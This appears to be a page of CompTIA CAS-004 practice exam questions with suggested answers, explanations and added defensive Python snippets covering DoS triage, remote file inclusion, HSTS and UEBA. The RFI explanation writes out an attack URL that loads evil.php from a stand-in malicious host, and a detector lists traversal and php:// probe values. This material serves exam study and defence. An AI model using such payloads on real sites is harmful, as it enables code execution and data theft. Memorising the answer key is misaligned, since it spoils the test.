CompTIA CAS-004 Practice Test - Questions Answers, Page 25
A company hosts a large amount of data in blob storage for its customers. The company recently had a number of issues with this data being prematurely deleted before the scheduled backup processes could be completed. The management team has asked the security architect for a recommendation that allows blobs to be deleted occasionally, but only after a successful backup. Which of the following solutions will BEST meet this requirement?

A. Mirror the blobs at a local data center.
B. Enable fast recovery on the storage account.
C. Implement soft delete for blobs.
D. Make the blob immutable.

Suggested answer: C

Explanation:

Soft delete allows blobs to be deleted as usual, but a deleted blob is retained and recoverable for a configured retention period before it is permanently removed. That matches the requirement exactly: customers can still delete blobs occasionally, and as long as the retention period is set longer than the backup window, a blob deleted before the scheduled backup can be undeleted and backed up before it expires. Immutability (D) would prevent the deletions the business wants to allow, mirroring (A) copies the data but does not stop the premature deletes, and fast recovery (B) is not a blob-level retention control.

Users are claiming that a web server is not accessible. A security engineer logs for the site. The engineer connects to the server and runs netstat -an and receives the following output:

A. Port scanning
B. ARP spoofing
C. Buffer overflow
D. Denial of service

Suggested answer: D

Explanation:

A denial of service (DoS) attack disrupts the normal functioning of a server by overwhelming it with requests or traffic. One indicator of such an attack is a large number of connections from a single source address. Here the netstat -an output shows many connections from 213.37.55.67, each from a different source port and in the TIME_WAIT state: one host has been opening and closing connections to the web server far faster than any legitimate client would, consuming socket and port resources and crowding out real users. A SYN flood would look slightly different, as a pile of half-open connections in SYN_RECV, but either way the pattern is a flood from one source. Port scanning (A) would show one source probing many local ports rather than port 80 repeatedly, ARP spoofing (B) is a layer-2 attack that netstat does not reveal, and a buffer overflow (C) leaves no such connection-table signature.
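The triage described above, as an added example rather than anything from the practice test: parse netstat -an output, group connections by remote address and state, flag a single source that holds an abnormal share of the server's connections, and distinguish a connection flood (TIME_WAIT/ESTABLISHED) from a SYN flood (SYN_RECV). The netstat lines are constructed here (the question's screenshot is not reproduced on the page); the flood source uses the address the explanation names, and the thresholds are assumptions to tune for the server.

```python
"""Summarise `netstat -an` output per remote IP and flag a DoS indicator:
one source holding most of the server's connections.

Added example. The netstat text is constructed; the thresholds below are
assumed starting points, not values from the exam question."""
import re
from collections import Counter, defaultdict

# Constructed sample in Linux `netstat -an` layout (proto recv-q send-q local foreign state):
# two legitimate clients, then one host that has churned 40 connections (TIME_WAIT)
# and still has 10 half-open ones (SYN_RECV) against the web server.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
tcp        0      0 10.0.0.5:80             198.51.100.7:44120      ESTABLISHED
tcp        0      0 10.0.0.5:80             203.0.113.9:52001       ESTABLISHED
""" + "".join(
    f"tcp        0      0 10.0.0.5:80             213.37.55.67:{40000 + i:<10}TIME_WAIT\n"
    for i in range(40)
) + "".join(
    f"tcp        0      0 10.0.0.5:80             213.37.55.67:{50000 + i:<10}SYN_RECV\n"
    for i in range(10)
)

LINE_RE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<foreign>\S+)\s*(?P<state>[A-Z_]+)?\s*$"
)


def parse_netstat(text):
    """Return a list of (remote_ip, local_port, state) for every TCP peer line;
    header lines and listening sockets (foreign address *) are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m or not m.group("proto").startswith("tcp"):
            continue
        foreign = m.group("foreign")
        if foreign.endswith(":*"):
            continue
        ip = foreign.rpartition(":")[0]
        local_port = m.group("local").rpartition(":")[2]
        rows.append((ip, local_port, m.group("state") or ""))
    return rows


def find_flood_sources(rows, min_conns=20, min_share=0.5):
    """Map ip -> {"total": n, "states": Counter} for every remote IP that holds
    at least min_conns connections AND at least min_share of all connections.
    Both cut-offs are assumed defaults; tune them to the server's normal load."""
    total = len(rows)
    if total == 0:
        return {}
    per_ip = defaultdict(Counter)
    for ip, _local_port, state in rows:
        per_ip[ip][state] += 1
    flagged = {}
    for ip, states in per_ip.items():
        n = sum(states.values())
        if n >= min_conns and n / total >= min_share:
            flagged[ip] = {"total": n, "states": states}
    return flagged


def classify(states):
    """Name the dominant pattern from a state histogram: mostly half-open
    connections (SYN_RECV) means a SYN flood; mostly completed or closed
    connections (ESTABLISHED/TIME_WAIT) means a connection or request flood."""
    half_open = states.get("SYN_RECV", 0)
    completed = states.get("TIME_WAIT", 0) + states.get("ESTABLISHED", 0)
    return "syn_flood" if half_open > completed else "connection_flood"


if __name__ == "__main__":
    conns = parse_netstat(SAMPLE_NETSTAT)
    for src, info in find_flood_sources(conns).items():
        print(src, info["total"], dict(info["states"]), classify(info["states"]))
```

On a live server the same grouping is `netstat -an | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -rn`; the script adds the per-state split, which is what tells you whether to look for SYN-cookie tuning or for rate limiting at the load balancer.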

A security engineer notices the company website allows users following example:

https://mycompany.com/main.php?Country=US

Which of the following vulnerabilities would MOST likely affect this site?

A. SQL injection
B. Remote file inclusion
C. Directory traversal
D. Unsecure references

Suggested answer: B

Explanation:

Remote file inclusion (RFI) is a web vulnerability that allows an attacker to make the application include an external file that the server then executes. This can lead to code execution, data theft, defacement, or other malicious actions. RFI typically occurs when a web application dynamically includes a script whose name or location comes from user-supplied input without validation.

In this case, the website takes a Country parameter from the URL and uses it to decide which file main.php includes. An attacker could craft a URL like this:

https://mycompany.com/main.php?Country=https://malicious.com/evil.php

The website would then fetch and execute evil.php from the attacker's domain, which could contain arbitrary code. In PHP this remote form only works when allow_url_include is enabled; with it disabled the same code is still exposed to local file inclusion and directory traversal, which is why the fix is to never use the parameter as a path and instead map it onto a fixed allowlist of files.
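The fix and the detection side of the RFI case above, as an added example (not code from the practice test; the template map, the country codes and the probe signatures are assumptions). The vulnerable pattern is the one the question describes, `include($_GET['Country'])` in PHP, where the parameter is used directly as a path. The hardened resolver treats the parameter as a key into a closed map instead, and the probe check flags the values a WAF or log review should alert on.

```python
"""Hardened include resolution for a main.php?Country=... style parameter,
plus a detector for remote/local file inclusion probes.

Added example. TEMPLATES is a constructed stand-in for the per-country page
fragments; the vulnerable original would pass the raw parameter to include()."""
import re
from urllib.parse import urlsplit

# Constructed allowlist: the ONLY files the Country parameter may select.
TEMPLATES = {
    "US": "templates/main_us.php",
    "DE": "templates/main_de.php",
    "JP": "templates/main_jp.php",
}

SAFE_CODE = re.compile(r"[A-Z]{2}")


def resolve_include(country):
    """Return the template path for a country code, or raise ValueError.
    The parameter never becomes a path: it is validated against a tight
    pattern and then looked up in a closed map, so neither a URL nor a
    traversal sequence can reach include()."""
    if not isinstance(country, str) or not SAFE_CODE.fullmatch(country):
        raise ValueError(f"rejected Country parameter: {country!r}")
    try:
        return TEMPLATES[country]
    except KeyError:
        raise ValueError(f"unknown country code: {country!r}") from None


def looks_like_rfi_probe(value):
    """Detection side: True for values that are inclusion attacks rather than
    country codes. A URL scheme (http, https, ftp, php://, data:), a
    traversal sequence, an absolute path or a null byte are the signatures
    to alert on in web logs or a WAF rule (assumed list, extend as needed)."""
    if "://" in value or urlsplit(value).scheme:
        return True
    return ".." in value or "\x00" in value or value.startswith(("/", "\\"))


def audit_requests(values):
    """Classify a batch of observed Country values (e.g. pulled from access
    logs) into accepted, rejected and probe buckets."""
    report = {"accepted": [], "rejected": [], "probes": []}
    for value in values:
        if looks_like_rfi_probe(value):
            report["probes"].append(value)
            continue
        try:
            resolve_include(value)
            report["accepted"].append(value)
        except ValueError:
            report["rejected"].append(value)
    return report


if __name__ == "__main__":
    # Constructed sample of parameter values as they might appear in access logs.
    sample = ["US", "DE", "FR", "https://malicious.com/evil.php", "../../etc/passwd", "php://input"]
    print(audit_requests(sample))
```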

A city government's IT director was notified by the city council that the following cybersecurity requirements must be met to be awarded a large federal grant:

* Logs for all critical devices must be retained for 365 days to enable monitoring and threat hunting.

* All privileged user access must be tightly controlled and tracked to mitigate compromised accounts.

* Ransomware threats and zero-day vulnerabilities must be quickly identified.

Which of the following technologies would BEST satisfy these requirements? (Select THREE).

A. Endpoint protection
B. Log aggregator
C. Zero trust network access
D. PAM
E. Cloud sandbox
F. SIEM
G. NGFW

Suggested answer: B, D, F

Explanation:

B) Log aggregator: A log aggregator collects, parses, and stores logs from many sources (network devices, servers, applications, and so on). Centralized, scalable storage is what makes the 365-day retention requirement practical, since individual devices rarely hold a year of logs.

D) PAM: Privileged access management controls and monitors the access of privileged users (such as administrators) to critical systems and data. PAM meets the requirement to control and track privileged access by enforcing least privilege, multifactor authentication, credential vaulting and rotation, and session recording.

F) SIEM: Security information and event management analyzes and correlates logs from many sources to detect and respond to security incidents. A SIEM meets the requirement to identify ransomware and zero-day activity quickly through real-time correlation rules, threat intelligence feeds, and incident response workflows, and it is the platform a threat hunter queries against the retained logs.


A security architect is designing a solution for a new customer who requires significant security capabilities in its environment. The customer has provided the architect with the following set of requirements:

* Capable of early detection of advanced persistent threats.

* Must be transparent to users and cause no performance degradation.

* Allow integration with production and development networks seamlessly.

* Enable the security team to hunt and investigate live exploitation techniques.

Which of the following technologies BEST meets the customer's requirements for security capabilities?

A. Threat Intelligence
B. Deception software
C. Centralized logging
D. Sandbox detonation

Suggested answer: B

Explanation:

Deception software creates realistic but fake assets (servers, applications, credentials, data, and so on) that mimic the real environment and lure attackers into interacting with them. No legitimate user has any reason to touch a decoy, so any interaction is a high-fidelity alert, which is how deception detects advanced persistent threats that evade signature-based tools. It also captures the attacker's tactics, techniques, and procedures (TTPs) by recording their actions on the decoys.

Deception software meets the customer's requirements because:

* It detects APTs early by presenting attractive targets and alerting the security team the moment one is engaged.

* It is transparent to users and causes no performance degradation because it sits alongside production systems and does not inspect or interfere with legitimate traffic.

* It integrates with production and development networks because decoys can be made to match each network's topology and configuration.

* It lets the security team hunt and investigate live exploitation techniques because every command and payload used against a decoy is recorded for analysis.

A software development company is building a new mobile application for its social media platform. The company wants to gain its users' trust by reducing the risk of on-path attacks between the mobile client and its servers and by implementing stronger digital trust. To support users' trust, the company has released the following internal guidelines:

* Mobile clients should verify the identity of all social media servers locally.

* Social media servers should improve TLS performance of their certificate status.

* Social media servers should inform the client to only use HTTPS.

Given the above requirements, which of the following should the company implement? (Select TWO).

A. Quick UDP internet connection
B. OCSP stapling
C. Private CA
D. DNSSEC
E. CRL
F. HSTS
G. Distributed object model

Suggested answer: B, F

Explanation:

OCSP stapling and HSTS are the two options that map directly onto the stated guidelines. With OCSP stapling the server periodically obtains a signed, time-limited OCSP response from the CA and sends it inside the TLS handshake, so the client can check certificate status locally without a separate round trip to the CA; that improves handshake performance and removes a privacy leak and a soft-fail point. HSTS (the Strict-Transport-Security response header) tells the client to use only HTTPS for that host for the stated max-age, so a later plain-HTTP link or typed URL is upgraded before any request leaves the device and an on-path attacker cannot downgrade the connection. A CRL (E) is the slower status mechanism stapling improves on, a private CA (C) or DNSSEC (D) does not by itself verify server identity on the client or enforce HTTPS, and QUIC (A) is a transport, not a trust control.
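The client side of the HSTS guideline above, as an added example that is not part of the practice test: a parser for the Strict-Transport-Security header and a small cache that applies the RFC 6797 rules a client must follow (ignore the header unless it arrived over TLS, honour max-age expiry, clear on max-age=0, apply includeSubDomains only when asked, and rewrite http:// URLs to https://). The host names and header values are constructed; the injectable clock exists only so the expiry logic can be exercised.

```python
"""HSTS header parsing and enforcement as a client would do it (RFC 6797).

Added example; the hosts and header values are constructed."""
import time
from urllib.parse import urlsplit, urlunsplit


def parse_hsts(header):
    """Parse a Strict-Transport-Security value into a policy dict.
    Returns None when max-age is missing or malformed, since RFC 6797
    requires it; directive names are case-insensitive."""
    policy = {"max_age": None, "include_subdomains": False, "preload": False}
    for raw in header.split(";"):
        token = raw.strip()
        if not token:
            continue
        name, _, value = token.partition("=")
        name, value = name.strip().lower(), value.strip().strip('"')
        if name == "max-age":
            if not value.isdigit():
                return None
            policy["max_age"] = int(value)
        elif name == "includesubdomains":
            policy["include_subdomains"] = True
        elif name == "preload":
            policy["preload"] = True
    return None if policy["max_age"] is None else policy


class HstsCache:
    """Known-HSTS-host store. `now` is injectable so expiry can be tested."""

    def __init__(self, now=time.time):
        self._now = now
        self._hosts = {}  # host -> (expires_at, include_subdomains)

    def observe(self, host, header, over_tls):
        """Record a policy from a response. RFC 6797 8.1: the header is only
        trusted when received over a secure transport, otherwise an on-path
        attacker could plant or erase policies. Returns True if applied."""
        if not over_tls:
            return False
        policy = parse_hsts(header)
        if policy is None:
            return False
        host = host.lower()
        if policy["max_age"] == 0:
            self._hosts.pop(host, None)  # max-age=0 tells the client to forget the host
            return True
        self._hosts[host] = (self._now() + policy["max_age"], policy["include_subdomains"])
        return True

    def must_use_https(self, host):
        """True if host, or a superdomain whose policy has includeSubDomains,
        has an unexpired entry."""
        host = host.lower()
        now = self._now()
        labels = host.split(".")
        for i in range(len(labels)):
            entry = self._hosts.get(".".join(labels[i:]))
            if entry is None:
                continue
            expires_at, include_sub = entry
            if now >= expires_at:
                continue
            if i == 0 or include_sub:
                return True
        return False


def upgrade_url(cache, url):
    """Rewrite an http:// URL to https:// when the host is a known HSTS host.
    RFC 6797 8.3: an explicit port 80 becomes the default https port."""
    parts = urlsplit(url)
    if parts.scheme != "http" or not cache.must_use_https(parts.hostname or ""):
        return url
    netloc = parts.hostname if parts.port == 80 else parts.netloc
    return urlunsplit(("https", netloc, parts.path, parts.query, parts.fragment))


if __name__ == "__main__":
    cache = HstsCache()
    cache.observe("mycompany.com", "max-age=31536000; includeSubDomains", over_tls=True)
    print(upgrade_url(cache, "http://mycompany.com/main.php?Country=US"))
```

The server side is a single header on every HTTPS response, and stapling is verified from the outside with `openssl s_client -connect host:443 -status`, which prints the stapled OCSP response if the server sends one.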

During a phishing exercise, a few privileged users ranked high on the failure list. The enterprise would like to ensure that privileged users have an extra security-monitoring control in place. Which of the following is the MOST likely solution?

A. A WAF to protect web traffic
B. User and entity behavior analytics
C. Requirements to change the local password
D. A gap analysis

Suggested answer: B

Explanation:

User and entity behavior analytics (UEBA) is the monitoring control that fits: the users who failed the exercise are the ones most likely to have their credentials phished for real, and UEBA watches what those accounts then do. It builds a baseline of each user's normal activity (working hours, source hosts, systems touched, volume of actions) and raises anomalies against it, which is how a compromised privileged account, an insider, or an APT using stolen credentials shows up even when every individual action is technically authorized. A WAF (A) protects web applications, not accounts; a password change (C) is a one-off response, not monitoring; a gap analysis (D) is an assessment, not a control.
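The baseline-and-anomaly idea above in working form, as an added example and not code from the practice test: a profile of each privileged user's normal hours, source hosts and daily logon volume is built from past events, and a new batch is scored against it. The events, the user names and the privileged-account list are constructed, and the scoring rules (unusual hour, new source host, volume above mean plus three standard deviations) are assumed starting points a real UEBA product would refine with far more features.

```python
"""Minimal UEBA-style scoring for privileged accounts.

Added example. The baseline and the new batch are constructed; PRIVILEGED
and the scoring rules are assumptions."""
import statistics
from collections import Counter, defaultdict
from datetime import datetime, timedelta

PRIVILEGED = {"jdoe"}  # constructed list of privileged accounts to watch


def constructed_baseline():
    """14 days of normal activity for admin 'jdoe': three logons on each
    weekday, office hours, always from the same workstation."""
    events = []
    start = datetime(2024, 3, 4)  # a Monday
    for day in range(14):
        d = start + timedelta(days=day)
        if d.weekday() >= 5:
            continue
        for hour in (9, 13, 17):
            events.append(("jdoe", (d + timedelta(hours=hour)).isoformat(), "wks-jdoe", "logon"))
    return events


def build_profiles(events):
    """Per-user baseline: hours seen, source hosts seen, logons per day."""
    profiles = defaultdict(lambda: {"hours": set(), "hosts": set(), "daily": Counter()})
    for user, ts, host, _action in events:
        t = datetime.fromisoformat(ts)
        p = profiles[user]
        p["hours"].add(t.hour)
        p["hosts"].add(host)
        p["daily"][t.date()] += 1
    return profiles


def daily_threshold(profile):
    """Volume cut-off: mean + 3 standard deviations of daily logons, with a
    floor of one standard deviation so a perfectly regular user still has
    some slack."""
    counts = list(profile["daily"].values())
    mean = statistics.fmean(counts)
    sd = statistics.pstdev(counts) if len(counts) > 1 else 0.0
    return mean + 3 * max(sd, 1.0)


def score_event(profiles, user, ts, host):
    """Reasons this single event deviates from the user's baseline."""
    p = profiles.get(user)
    if p is None:
        return ["no_baseline"]
    t = datetime.fromisoformat(ts)
    reasons = []
    if t.hour not in p["hours"]:
        reasons.append("unusual_hour")
    if host not in p["hosts"]:
        reasons.append("new_source_host")
    return reasons


def review_batch(profiles, events):
    """Score a batch of new events for privileged users only; per-event
    anomalies plus one volume_spike alert per (user, day) over threshold."""
    alerts = []
    per_day = Counter()
    for user, ts, host, _action in events:
        if user not in PRIVILEGED:
            continue
        per_day[(user, datetime.fromisoformat(ts).date())] += 1
        reasons = score_event(profiles, user, ts, host)
        if reasons:
            alerts.append({"user": user, "time": ts, "host": host, "reasons": reasons})
    for (user, day), n in per_day.items():
        if user in profiles and n > daily_threshold(profiles[user]):
            alerts.append({"user": user, "time": day.isoformat(), "host": None, "reasons": ["volume_spike"]})
    return alerts


if __name__ == "__main__":
    profiles = build_profiles(constructed_baseline())
    # Constructed: eight logons at 03:xx from a VPN pool address, i.e. the
    # pattern of a phished credential being used after hours.
    batch = [("jdoe", f"2024-03-19T03:{m:02d}:00", "vpn-pool-17", "logon") for m in range(8)]
    for alert in review_batch(profiles, batch):
        print(alert)
```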

Users are reporting intermittent access issues with a new cloud application that was recently added to the network. Upon investigation, the security administrator notices the human resources department is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application. Which of the following MOST likely needs to be done to avoid this in the future?

A. Modify the ACLs.
B. Review the Active Directory.
C. Update the marketing department's browser.
D. Reconfigure the WAF.

Suggested answer: A

Explanation:

Modifying the ACLs (access control lists) is the most likely fix. ACLs define which users and groups may reach which resources, and the symptom is department-shaped: one group works and another does not, on the same application. That points to the marketing group being missing from, or denied by, the ACL that grants access to the application or to the data sources its reports query, rather than to a browser version or to the WAF, which would not distinguish departments. Reviewing Active Directory (B) may be part of the investigation, but the change that prevents the problem is the ACL entry.

A security administrator has been tasked with hardening a domain controller against lateral movement attacks. Below is an output of running services:

Which of the following configuration changes must be made to complete this task?

A. Stop the Print Spooler service and set the startup type to disabled.
B. Stop the DNS Server service and set the startup type to disabled.
C. Stop the Active Directory Web Services service and set the startup type to disabled.
D. Stop Credential Manager service and leave the startup type to disabled.

Suggested answer: A

Explanation:

Stopping the Print Spooler service and setting its startup type to disabled is the configuration change that hardens a domain controller against lateral movement. A domain controller has no business printing, and the spooler has a long history of remote code execution flaws (the PrintNightmare family) that give an attacker SYSTEM on the DC. Its MS-RPRN interface can also be abused to coerce the DC into authenticating to an attacker-controlled host, which is a classic relay primitive, so Microsoft's guidance is to disable the spooler on domain controllers. The other options would break the DC: DNS Server (B) and Active Directory Web Services (C) are services the domain depends on, and option D is not a valid change (a service cannot be left at a disabled startup type it was not set to).

An architectural firm is working with its security team to ensure that any draft images that are leaked to the public can be traced back to a specific external party. Which of the following would BEST accomplish this goal?

A. Properly configure a secure file transfer system to ensure file integrity.
B. Have the external parties sign non-disclosure agreements before sending any images.
C. Only share images with external parties that have worked with the firm previously.
D. Utilize watermarks in the images that are specific to each external party.

Suggested answer: D

Explanation:

Utilizing watermarks that are specific to each external party is the only option that makes a leaked draft traceable to its source. A watermark is a visible or invisible mark embedded in an image to indicate ownership, authenticity, or origin; when a distinct mark is embedded per recipient (forensic watermarking), the copy that surfaces in public identifies which party received it. The other options reduce the likelihood of a leak or create legal recourse but provide no attribution after one occurs. Two practical caveats: the mark should survive the re-encoding, resizing and cropping a leaked image typically undergoes, which favours invisible, redundantly embedded marks over a corner logo, and the firm needs a record of which mark went to which party.
